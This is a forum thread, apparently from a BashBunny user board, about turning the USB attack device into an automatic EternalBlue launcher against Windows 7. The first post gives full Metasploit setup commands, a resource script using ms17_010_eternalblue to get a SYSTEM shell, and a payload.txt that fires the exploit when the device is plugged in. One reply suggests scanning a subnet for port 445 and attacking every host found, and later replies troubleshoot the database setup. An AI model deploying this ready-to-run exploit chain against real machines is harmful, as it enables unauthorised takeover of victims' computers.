Metasploit, Eternalblue and a Bunny

[hanshaze]

My latest BashBunny-Challenge.....MSF - MS17_010 - BashBunny

Thanks to Astr0baby, iam just a sharer of his excellent thoughts

 

Lets go.....

 

Make sure to set some date for TLS/SSL to work ;)
# date -s "20170925"

Add this to /etc/apt/sources.list
deb http://http.us.debian.org/debian/ jessie-updates main

# apt-get update
# apt-get -y install autoconf bison build-essential curl git-core libapr1 libaprutil1 libcurl4-openssl-dev libgmp3-dev # curl -sSL https://get.rvm.io | bash -s stable
# source /etc/profile.d/rvm.sh
# rvm requirements
# rvm list known
# rvm install 2.4.1
# vi /root/.bashrc
Add at the end
source /etc/profile/rvm.sh
rvm use 2.4.1 --default
# mkdir /root/METASPLOIT
# cd /root/METASPLOIT/
# wget https://raw.githubusercontent.com/iam1980/metasploit-vps-installer/master/msf_vps_installer.sh
# chmod +x msf_vps_installer.sh
# ./msf_vps_installer.sh
# git config --global user.name "USER"
# git config --global user.email "user@example.com"
# ./msfupdate

Check the /etc/dhcp/dhcpd.conf

range 172.16.64.10 - 172.16.64.12 and set to only one value range 172.16.64.64 - 172.16.64.64

Save this to ~/metasploit-framework as cmd.rc

-----
use exploit/windows/smb/ms17_010_eternalblue
set PAYLOAD windows/x64/exec
set RHOST 172.16.64.64
set CMD cmd.exe
exploit

-----
The above is ideal when we want to get a NT SYSTEM/AUTHORITY shell on the target Windows 7 SP1 x64
(unlocked)

If the target is locked we can use another payload such this one


So RHOST would be again 172.16.64.64 and LHOST 172.16.64.1 … This can be easily scripted via Metasploit RC
script so ;)
The Metasploit RC scripts should be placed in the /root/metasploit-framework on the Bashbunny so we can call it
from the PAYLOAD.TXT for the corresponding Attach Switch position .
So ideally this would look like this (switch1 or switch 2) payload.txt

#!/bin/bash
LED SETUP
ATTACKMODE RNDIS_ETHERNET
#Set some current time ..... check your watch
date -s "20170523 23:23"
LED ATTACK
/root/metasploit-framework/msfconsole -r /root/metasploit-framework/eternal-cmd.rc &
LED FINISH

The target Windows 7 should have an accessible SMB port 445 from the USB network that Bashbunny device
create.

Default Windows system has a firewall on so the attack wont work as the port is blocked.

For the demonstration purpose we assume there is no firewall on ..
After a while you should get a NT AUTHORITY\ SYSTEM cmd shell pop up on your Win 7 desktop :)
 
 

[i8igmac]

Perform nmap scan in metasploit. On the subnet, discover all device on port 445 then use the metasploit database to launch the attack on all devices discovered.

 

I made some assumptions on your scenario.

[v0dka]

helloooo    I met a problem:      I wrote a payload.txt as you told  But it didnt run metasploit at all.  So I add a "source /etc/profile.d/rvm.sh" to the payload. Msf will run for a moment as follows:

 

root@bunny:~# ps -aux | grep 'metasploit'                              

root       920 33.4  8.3  57556 42496 ?        Sl   13:18   0:10 ruby /root/metasploit-framework/msfconsole -r /root/metasploit-framework/1.rc
root      1115  0.0  0.1   2072   544 pts/0    S+   13:19   0:00 grep metasploit
root@bunny:~#

But It will stop after that.

root@bunny:~# ps -aux | grep 'metasploit'
root      1220  0.0  0.1   2068   544 pts/0    S+   13:19   0:00 grep metasploit

 

No payload will execute .

I tried to debug it as command :

ruby /root/metasploit-framework/msfconsole -r /root/metasploit-framework/1.rc  >> /root/udisk/exp/msf.log

But the file is empty

this command will work if I execute it in  BashBunny SSH.    The payload also worked  if I replace it with another command.       So   I dont know why It doesnt work.

 

Thanks in advance

[b0N3z]

I've notice the last metasploit payload made had an rc file that it executed and ran flawlessly if configured right. Also make sure metasploit is connected to a database with you can make by downloading the msfdb script from GitHub, give it a quick edit for the bunny and execute. Worked great for me 

[thatalbinofrog]

On 12/26/2017 at 5:23 AM, b0N3z said:

I've notice the last metasploit payload made had an rc file that it executed and ran flawlessly if configured right. Also make sure metasploit is connected to a database with you can make by downloading the msfdb script from GitHub, give it a quick edit for the bunny and execute. Worked great for me 

I've got this 90% up and running, but can't get metasploit to connect to the postgresql database.

Can you please explain how to do this step in further detail?

Thanks!

[Just_a_User]

1 hour ago, thatalbinofrog said:

Can you please explain how to do this step in further detail?

In the past I had issues with this and this guy helped me with this command

 

[thatalbinofrog]

11 hours ago, Just_a_User said:

In the past I had issues with this and this guy helped me with this command

Thanks for the reply, but that command didn't help. My database.yml file would not generate, do you know how to fix this?

 

 

[b0N3z]

@thatalbinofrog I looked up how to make a metasploit database and tried a couple different things till I got it.  I cant quite remember how I did it though

[PoSHMagiC0de]

Hmm, so I have a thought.  Since this is only for one payload, why not try just using the module for eternal  blue and the user's custom shellcode to execute code?  The Bunny setup would be easier and the spinup would be a lot faster and less extensive for the BashBunny.  

[hanshaze]

On 1/28/2019 at 3:53 PM, thatalbinofrog said:

I've got this 90% up and running, but can't get metasploit to connect to the postgresql database.

Can you please explain how to do this step in further detail?

Thanks!

sudo /etc/init.d/postgresql start && sudo msfdb init

# or

sudo systemctl daemon-reload && sudo pg_ctlcluster 12 main start